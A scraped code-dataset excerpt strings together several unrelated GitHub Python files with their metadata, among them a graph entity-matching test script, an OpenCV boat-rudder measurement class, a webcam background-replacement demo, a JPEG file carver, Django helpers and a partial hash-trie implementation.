gcn_dim = 768
test_dataset = MergedMatchingDataset(args.test_path, tableA, tableB, other_path=[args.train_path, args.val_path])
test_iter = DataLoader(test_dataset, batch_size=args.batch_size, collate_fn=collate_fn, shuffle=False)
embedmodel = EmbedModel(useful_field_num=useful_field_num,device=args.gpu)
model = gcn(dims=[gcn_dim]*(args.gcn_layer + 1))
criterion = nn.CrossEntropyLoss().to(embedmodel.device)
logger = set_logger()
if args.checkpoint_path:
checkpoint = torch.load(args.checkpoint_path)
if len(args.gpu) == 1:
new_state_dict = {k.replace('module.', ''): v for k, v in checkpoint["embed_model"].items()}
embedmodel.load_state_dict(new_state_dict)
else:
embedmodel.load_state_dict(checkpoint["embed_model"])
model.load_state_dict(checkpoint["model"])
test_type = [checkpoint["type"]]
logger.info("Test Type:\t{}".format(checkpoint["type"]))
else:
test_type = args.test_type
embedmodel = embedmodel.to(embedmodel.device)
model = model.to(embedmodel.device)
test(iter=test_iter, logger=logger, model=model, embed_model=embedmodel, crit=criterion, score_type=test_type)
|
ChenRunjin/GNEM
|
test.py
|
test.py
|
py
| 6,754 |
python
|
en
|
code
| 5 |
github-code
|
6
|
[
{
"api_name": "numpy.asarray",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional.softmax",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "utils.accuracy",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 120,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "os.path.abspath",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "torch.manual_seed",
"line_number": 153,
"usage_type": "call"
},
{
"api_name": "torch.cuda.manual_seed_all",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 154,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.seed",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 155,
"usage_type": "attribute"
},
{
"api_name": "utils._read_csv",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "utils._read_csv",
"line_number": 158,
"usage_type": "call"
},
{
"api_name": "dataset.MergedMatchingDataset",
"line_number": 162,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "dataset.collate_fn",
"line_number": 165,
"usage_type": "name"
},
{
"api_name": "EmbedModel.EmbedModel",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "GCN.gcn",
"line_number": 170,
"usage_type": "call"
},
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 172,
"usage_type": "name"
},
{
"api_name": "logger.set_logger",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "logger.info",
"line_number": 185,
"usage_type": "call"
}
] |
35037176201
|
import cv2
import numpy as np
from analyzers.analyseContour import AnalyseContour
from analyzers.contour import Contour
class AnalyseSafran(AnalyseContour):
"""
Class qui mesure la taille du safran qui sort de l'eau.
Attributs:
x1RefPoint (int): coordonnée x du premier point de référence correspond au point le plus haut du safran.
y1RefPoint (int): coordonnée y du premier point de référence correspond au point le plus haut du safran.
x2RefPoint (int): coordonnée x du deuxième point de référence pour calculer la droite du safran.
y2RefPoint (int): coordonnée y du deuxième point de référence pour calculer la droite du safran.
"""
def __init__(self, x1, y1, x2, y2, x1RefPoint, y1RefPoint, x2RefPoint, y2RefPoint, qualityLimit):
super().__init__(x1, y1, x2, y2, qualityLimit)
self.x1RefPoint = x1RefPoint - x1
self.y1RefPoint = y1RefPoint - y1
self.x2RefPoint = x2RefPoint - x1
self.y2RefPoint = y2RefPoint - y1
def compute(self, frame):
"""
Méthode qui mesure la taille du safran qui sort de l'eau.
"""
m = (self.y2RefPoint - self.y1RefPoint) / (self.x2RefPoint - self.x1RefPoint)
p = self.y1RefPoint - m * self.x1RefPoint
cropFrame = frame[self.y1:self.y2, self.x1:self.x2]
qualityIndex = self.embrunDetection.detection(cropFrame)
# Conversion en noir et blanc et floutage
gray_img_safran = cv2.cvtColor(cropFrame, cv2.COLOR_BGR2GRAY)
gray_img_safran = cv2.GaussianBlur(gray_img_safran, (3, 7), 0)
# Dessins de toutes les bordures
median_pix = np.median(gray_img_safran)
lower = int(max(0, 0.5*median_pix))
upper = int(min(255, 1.3*median_pix))
edged = cv2.Canny(gray_img_safran, lower, upper)
# Détection des contours
# La variable de hiérarchie contient des informations sur la relation entre chaque contour. (si un contour est dans un contour)
contours_list_safran, hierarchy = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours_list_safran:
contourSafran = None
for c in contours_list_safran:
# Si un contour est à moins de 15 pixel du point (point sur le bord avant du safran)
if abs(cv2.pointPolygonTest(c, (self.x1RefPoint + 1, self.y1RefPoint + 3), True)) < 15:
contourSafran = c
tOffSetSafran = (self.x1, self.y1)
points = []
# Regarde si les points correspondent plus ou moins à l'équation du safran
# Equation qui représente la droite au niveau du safran
for point in c:
x = point[0][0]
y = point[0][1]
# Résultat de l'équation
resultEquation = m * x - y + p
if resultEquation > -15 and resultEquation < 15:
points.append((x, y))
if len(points) >= 2:
# firstPointSafran = min(points, key=lambda x:x[1]) # Plus petite valeur en y
firstPointSafran = (self.x1RefPoint, self.y1RefPoint)
# Plus grande valeur en y
secondPointSafran = max(points, key=lambda x: x[1])
# Ajout du décalage pour correspondre sur l'image original
firstPointSafranOffSet = tuple(map(lambda x, y: x + y, firstPointSafran, tOffSetSafran))
secondPointSafranOffSet = tuple(map(lambda x, y: x + y, secondPointSafran, tOffSetSafran))
hauteurSafran = secondPointSafran[1] - firstPointSafran[1]
# Décalage des coordonnées du contour pour correspondre sur l'image original (frame)
contourSafranOffset = contourSafran + (self.x1, self.y1)
return Contour(hauteurSafran, contourSafranOffset, firstPointSafranOffSet, secondPointSafranOffSet, qualityIndex)
return Contour(None, None, None, None, qualityIndex)
|
Torystan/analyse-images
|
analyzers/analyseSafran.py
|
analyseSafran.py
|
py
| 4,231 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "analyzers.analyseContour.AnalyseContour",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "cv2.cvtColor",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "cv2.GaussianBlur",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.median",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "cv2.Canny",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "cv2.findContours",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "cv2.RETR_TREE",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "cv2.CHAIN_APPROX_SIMPLE",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "cv2.pointPolygonTest",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "analyzers.contour.Contour",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "analyzers.contour.Contour",
"line_number": 90,
"usage_type": "call"
}
] |
73727669948
|
import torch
def get_device(model=None):
"""Returns two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
Returns a two-tuple containing a PyTorch device (CPU or GPU(s)) and number of available CUDA
devices. If `model` is not None, and a CUDA device is available, the model is placed on the
CUDA device with `model.to(device)`. If multiple GPUs are available, the model is parallized
with `torch.nn.DataParallel(model)`.
Args:
(Torch.nn.Module) PyTorch model, if CUDA device is available this function will place the
model on the CUDA device with `model.to(device)`. If multiple CUDA devices are available,
the model is parallized with `torch.nn.DataParallel(model)`.
Returns:
A two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
"""
n_gpu = 0
# use a GPU if available
if torch.cuda.is_available():
device = torch.device("cuda")
n_gpu = torch.cuda.device_count()
# if model is provided, we place it on the GPU and parallize it (if possible)
if model:
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
model_names = ', '.join([torch.cuda.get_device_name(i) for i in range(n_gpu)])
print('Using CUDA device(s) with name(s): {}.'.format(model_names))
else:
device = torch.device("cpu")
print('No GPU available. Using CPU.')
return device, n_gpu
def preprocess_query(query):
"""Preprocesses `query` to look more like natural language.
Preprocess `query` to look more like natural language by puntuating it with a question mark and
rearanging into a subject-verb-object (SVO) topology.
Args:
query (str): Query from Wiki- or Medhop.
Returns:
`query`, punctuated by a question mark and re-arranged into an SVO topology.
"""
return ' '.join(query.split(' ')[1:] + query.split(' ')[0].split('_')).replace('?', '') + '?'
|
bowang-lab/Transformer-GCN-QA
|
src/utils/model_utils.py
|
model_utils.py
|
py
| 2,040 |
python
|
en
|
code
| 15 |
github-code
|
6
|
[
{
"api_name": "torch.cuda.is_available",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.cuda.device_count",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.DataParallel",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "torch.cuda.get_device_name",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 34,
"usage_type": "call"
}
] |
73675801466
|
import os, sys
proj_path = "/home/webuser/webapps/tigaserver/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tigaserver_project.settings")
sys.path.append(proj_path)
os.chdir(proj_path + "util_scripts/")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
from django.db.models import Count
from tigaserver_app.models import EuropeCountry, Report, ExpertReportAnnotation, Categories
current_progress = Report.objects.exclude(creation_time__year=2014).exclude(note__icontains="#345").exclude(hide=True).exclude(photos=None).filter(type='adult').annotate(n_annotations=Count('expert_report_annotations')).filter(n_annotations__lt=3).exclude(n_annotations=0).order_by('-server_upload_time')
reports_filtered = filter(lambda x: not x.deleted and x.latest_version, current_progress)
for c in current_progress:
country = 'None'
if c.country is not None:
country = c.country.name_engl
print("Report in progress {0} - country {1} - date {2}".format(c.version_UUID, country, c.server_upload_time ))
assigned_to = ExpertReportAnnotation.objects.filter(report=c)
for a in assigned_to:
print("\t - assigned to {0} from country , regional manager , country has regional manager ".format( a.user.username ))
|
Mosquito-Alert/mosquito_alert
|
util_scripts/check_in_progress_reports.py
|
check_in_progress_reports.py
|
py
| 1,276 |
python
|
en
|
code
| 6 |
github-code
|
6
|
[
{
"api_name": "os.environ.setdefault",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.core.wsgi.get_wsgi_application",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.Report.objects.exclude",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.Report.objects",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "tigaserver_app.models.Report",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "django.db.models.Count",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation.objects.filter",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation.objects",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "tigaserver_app.models.ExpertReportAnnotation",
"line_number": 25,
"usage_type": "name"
}
] |
1601092211
|
__author__ = "Meet Dave"
__version__ = "1.0"
__maintainer__ = "Meet Dave"
__email__ = "[email protected]"
# Load libraries
import matplotlib.pyplot as plt
import torch
import cv2
import numpy as np
from torchvision import models
from torchvision import transforms
from make_video import make_video
# Load pretrained model
deeplapv3_101 = models.segmentation.deeplabv3_resnet101(pretrained=True).eval()
# Load background image
background_path = "../images/books-seats.png"
background = cv2.imread(background_path)
background = cv2.cvtColor(background, cv2.COLOR_BGR2RGB)
video_path = "../images/test1.avi"
# Webcam stream
cap = cv2.VideoCapture(0)
ret, img = cap.read()
height = img.shape[0]
width = img.shape[1]
video_download = make_video(video_path,width,height)
background = cv2.resize(background, (width,height))
background = background.astype(float)
# Preprocess class
preprocess = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((256,256)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
while(True):
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Preprocess image
input_img = preprocess(img)
# Creating a batch dimension
input_batch = input_img.unsqueeze(0)
# Inference
output = deeplapv3_101(input_batch)['out'][0]
final_output = output.argmax(dim=0)
# Just keep person class and make everything else background
person_output = torch.zeros_like(final_output)
person_output[final_output == 15] = 1
img_resize = cv2.resize(img,(256,256))
# Get person segmentation
foreground = img_resize * person_output.numpy()[:,:,None]
foreground = foreground.astype(float)
foreground_orig_size = cv2.resize(foreground,(width,height))
# Create alpha mask for blending
th, alpha = cv2.threshold(foreground_orig_size,0,255, cv2.THRESH_BINARY)
# Smooth the edges for smooth blending
alpha = (cv2.GaussianBlur(alpha, (7,7),0))/255
final = foreground_orig_size * alpha + background * (1 - alpha)
final = final[...,::-1]
final = (final).astype(np.uint8)
cv2.imshow('frame',final)
video_download.write(final)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
meetdave06/random-cv-tasks
|
test1/test1.py
|
test1.py
|
py
| 2,455 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torchvision.models.segmentation.deeplabv3_resnet101",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torchvision.models.segmentation",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "torchvision.models",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "cv2.imread",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "make_video.make_video",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.ToPILImage",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Resize",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Normalize",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "cv2.cvtColor",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "torch.zeros_like",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "cv2.threshold",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "cv2.GaussianBlur",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "cv2.imshow",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 97,
"usage_type": "call"
}
] |
71904076349
|
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
gauth = GoogleAuth()
gauth.LoadCredentialsFile("mycreds.txt")
if gauth.credentials is None:
gauth.LocalWebserverAuth()
elif gauth.access_token_expired:
gauth.Refresh()
else:
gauth.Authorize()
gauth.SaveCredentialsFile("mycreds.txt")
drive = GoogleDrive(gauth)
file1 = drive.CreateFile({'title': 'Automata.txt'}) # Create GoogleDriveFile instance with title 'Hello.txt'.
file1.SetContentString('Automataaa') # Set content of the file from given string.
file1.Upload()
print(drive)
|
gmagannaDevelop/GlcJournal
|
pydrive/automated_access.py
|
automated_access.py
|
py
| 568 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "pydrive.auth.GoogleAuth",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pydrive.drive.GoogleDrive",
"line_number": 18,
"usage_type": "call"
}
] |
39380382951
|
import datetime
import jpholiday
from django import template
register = template.Library() # Djangoのテンプレートタグライブラリ
# カスタムフィルタとして登録する
@register.filter
def get_dict_value(dictionary, key):
return dictionary.get(key)
@register.filter
def append_string(dest, src):
return dest + src
@register.filter
def get_day_class(date):
day_class = ''
# dateは年/月/日形式の文字列
#d = datetime.strptime(date,'%Y/%m/%d')
# strptimeを使用すると、is_holidayが正しく動作しないためのワークアラウンド
# datetime.date(2020,7,23,0,0)になるのが原因?
sp = date.split('/')
day = datetime.date(int(sp[0]), int(sp[1]), int(sp[2]))
if day.weekday() == 5:
# 土曜日
day_class = 'text-primary'
elif day.weekday() == 6 or jpholiday.is_holiday(day):
# 日曜 or 祝日
day_class = 'text-danger'
return day_class
@register.filter
def get_monthly_max(monthly_list):
max_count = 0
for date, count in monthly_list:
max_count = max(max_count, count)
return max_count
|
manakamu/docker
|
django/Docker-Django/django_project/pole/templatetags/pole_tags.py
|
pole_tags.py
|
py
| 1,141 |
python
|
ja
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.template.Library",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "datetime.date",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "jpholiday.is_holiday",
"line_number": 29,
"usage_type": "call"
}
] |
37964221731
|
import sys
import os
import random
from PIL import Image
'''
Simple image carver. Right now it will assemble any and all JPEGS found including partial fragmented files. It does not find the rest of the file.
You must have pillow installed. You can do that by `pip install pillow`.
YOU MUST HAVE PYTHON 3 NOT 2! THE Pillow version used is the python version 3 and I can't guarantee any of this works on python 2.
'''
def main():
if len(sys.argv) < 2:
print("Invalid input, you must specify a file as the first argument.")
exit(0)
readFile(sys.argv[1])
# Reads file and creates the list of SOI AND EOI markers
def readFile(filename):
startMarkerArr = []
endMarkerArr = []
sosArr = []
counter = 0
fileSize = os.stat(filename).st_size
file = open(filename, 'rb')
fileBuffer = bytearray(file.read())
while counter < fileSize:
byte1 = bytes([fileBuffer[counter]])
byte2 = bytes([fileBuffer[counter+1]])
if findStart(byte1, byte2):
startMarkerArr.append(counter)
if findEnd(byte1, byte2):
endMarkerArr.append(counter)
counter += 2
print("Found markers")
pairs = findPairs(startMarkerArr, endMarkerArr, sosArr)
validCount = buildFile(pairs)
#Finds SOI
def findStart(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD8':
return True
return False
#Finds EOI
def findEnd(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD9':
return True
return False
#Creates the pairs of SOI and EOI markers
def findPairs(startMarkerArr, endMarkerArr, sosArr):
markerPairs = []
for startI in range(0, len(startMarkerArr)):
for endI in range(0, len(endMarkerArr)):
if startMarkerArr[startI] < endMarkerArr[endI] + 2:
markerPairs.append((startMarkerArr[startI], endMarkerArr[endI]))
print("Found pairs list size is " + str(len(markerPairs)))
return markerPairs
#Tests all pairs and tests/ deletes invalid images using Pillow/ PIL
# Also tests to see if the discovered file is the smallest of the ones generated from the same SOI
def buildFile(markerPairs):
file = open(sys.argv[1], 'rb')
byteBuffer = file.read()
counter = 0
smallestHashMap = {}
while counter < len(markerPairs):
jpegBytes = bytearray()
start = markerPairs[counter][1]
jpegBytes.extend(byteBuffer[markerPairs[counter][0]:markerPairs[counter][1]+2])
name = str(random.random())
jpegFile = open(name + ".jpg", 'wb+')
jpegFile.write(jpegBytes)
try:
Image.open(name + ".jpg")
except IOError:
os.remove(name + ".jpg")
print("Invalid image removed")
else:
if smallestHashMap.get(markerPairs[counter][0]) != None:
print(len(jpegBytes), smallestHashMap[markerPairs[counter][0]][0])
if counter != 0 and smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) < smallestHashMap[markerPairs[counter][0]][0]:
print("Smaller image found, duplicate removed!")
os.remove(smallestHashMap[markerPairs[counter][0]][1])
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
if smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) > smallestHashMap[markerPairs[counter][0]][0]:
os.remove(name + ".jpg")
print("Original is the smallest duplicate removed")
if smallestHashMap.get(markerPairs[counter][0]) == None:
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
print("One valid image has been added or replaced")
counter += 1
# No idea what this does
if __name__ == '__main__':
main()
|
steviekong/Jpeg_carver
|
carver.py
|
carver.py
|
py
| 3,434 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.stat",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "random.random",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "os.remove",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 87,
"usage_type": "call"
}
] |
41254027126
|
from copy import copy, deepcopy
from itertools import izip
from burrahobbit.util import all
SENTINEL = object()
SHIFT = 5
BMAP = (1 << SHIFT) - 1
BRANCH = 2 ** SHIFT
MAXBITMAPDISPATCH = 16
def relevant(hsh, shift):
""" Return the relevant part of the hsh on the level shift. """
return hsh >> shift & BMAP
POPCOUNT_TBL = [0] * (2 ** 16)
for idx in xrange(2 ** 16):
POPCOUNT_TBL[idx] = (idx & 1) + POPCOUNT_TBL[idx >> 1]
def bit_count(v):
return (POPCOUNT_TBL[v & 0xffff] +
POPCOUNT_TBL[(v >> 16) & 0xffff])
def doc(docstring):
""" Decorator to set docstring of function to docstring. """
def deco(fn):
""" Implementation detail. """
fn.__doc__ = docstring
return fn
return deco
ASSOC = "\n".join([
"Add AssocNode node whose key's hash is hsh to the node or its children.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
IASSOC = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is added to it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
GET = "\n".join([
"Get value of the AssocNode with key whose hash is hsh in the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
WITHOUT = "\n".join([
"Remove AssocNode with key whose hash is hsh from the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
IWITHOUT = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is removed from it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
class Node(object):
__slots__ = []
def __and__(self, other):
new = NULLNODE
for node in other:
try:
self.get(hash(node.key), 0, node.key)
except KeyError:
pass
else:
new = new._iassoc(hash(node.key), 0, node)
return new
def __xor__(self, other):
new = self
for node in other:
new = new.xor(node.hsh, 0, node)
return new
def __or__(self, other):
new = self
for node in other:
new = new.assoc(node.hsh, 0, node)
return new
def __eq__(self, other):
return all(node == othernode for node, othernode in izip(self, other))
def __neq__(self, other):
return any(node != othernode for node, othernode in izip(self, other))
class NullNode(Node):
""" Dummy node being the leaf of branches that have no entries. """
__slots__ = []
def xor(self, hsh, shift, node):
return node
_ixor = xor
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# Because there currently no node, the new node
# is the node to be added.
return node
# The NullNode does not need to be modified if a new association is
# created because it only returns the new node, hence _iassoc = assoc.
_iassoc = assoc
def get(self, hsh, shift, key):
# There is no entry with the searched key because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
@doc(WITHOUT)
def without(self, hsh, shift, key):
# There is no entry with the key to be removed because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
_iwithout = without
def __iter__(self):
# There are no keys contained in a NullNode. Hence, an empty
# iterator is returned.
return iter([])
# Likewise, there are no values and items in a NullNode.
iteritems = itervalues = __iter__
def __copy__(self):
return self
def cutoff(self, hsh):
return self
# We only need one instance of a NullNode because it does not contain
# any data.
NULLNODE = NullNode()
class HashCollisionNode(Node):
""" If hashes of two keys collide, store them in a list and when a key
is searched, iterate over that list and find the appropriate key. """
__slots__ = ['children', 'hsh']
def __init__(self, nodes):
self.children = nodes
self.hsh = hash(nodes[0].hsh)
def xor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
return HashCollisionNode(self.children + [node])
return self
def _ixor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
self.children.append(node)
return self
@doc(GET)
def get(self, hsh, shift, key):
# To get the child we want we need to iterate over all possible ones.
# The contents of children are always AssocNodes,
# so we can safely access the key member.
for node in self.children:
if key == node.key:
return node
raise KeyError(key)
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, return a new node
# with it added to the children, otherwise return a DispatchNode.
if hsh == self.hsh:
return HashCollisionNode(self.children + [node])
return DispatchNode.make(shift, [self, node])
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, add it to the
# children, otherwise return a DispatchNode.
if hsh == self.hsh:
self.children.append(node)
return self
return DispatchNode.make(shift, [self, node])
@doc(WITHOUT)
def without(self, hsh, shift, key):
# Remove the node whose key is key from the children. If it was the
# last child, return NULLNODE. If there was no member with a
# matching key, raise KeyError.
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
return HashCollisionNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
self.children = newchildren
return self
def __iter__(self):
for node in self.children:
for elem in node:
yield elem
def __copy__(self):
return HashCollisionNode(map(copy, self.children))
def cutoff(self, hsh):
if self.hsh <= hsh:
return NULLNODE
return self
class ListDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Only feasable for a little amount of items as a list of length nitems
is always stored.
Only accepts integers as keys. """
__slots__ = ['items']
def __init__(self, nitems=None, items=None):
if items is None:
items = [SENTINEL for _ in xrange(nitems)]
self.items = items
def replace(self, key, item):
""" Return a new ListDispatch with the the keyth item replaced
with item. """
return ListDispatch(
None,
self.items[:key] +
[item] +
self.items[key + 1:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
self.items[key] = item
return self
def __getitem__(self, key):
value = self.items[key]
if value is SENTINEL:
raise KeyError(key)
return value
def get(self, key, default):
""" Get keyth item. If it is not present, return default. """
value = self.items[key]
if value is not SENTINEL:
return value
return default
def remove(self, key):
""" Return new ListDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
return self.replace(key, SENTINEL)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
self._ireplace(key, SENTINEL)
return self
def to_bitmapdispatch(self):
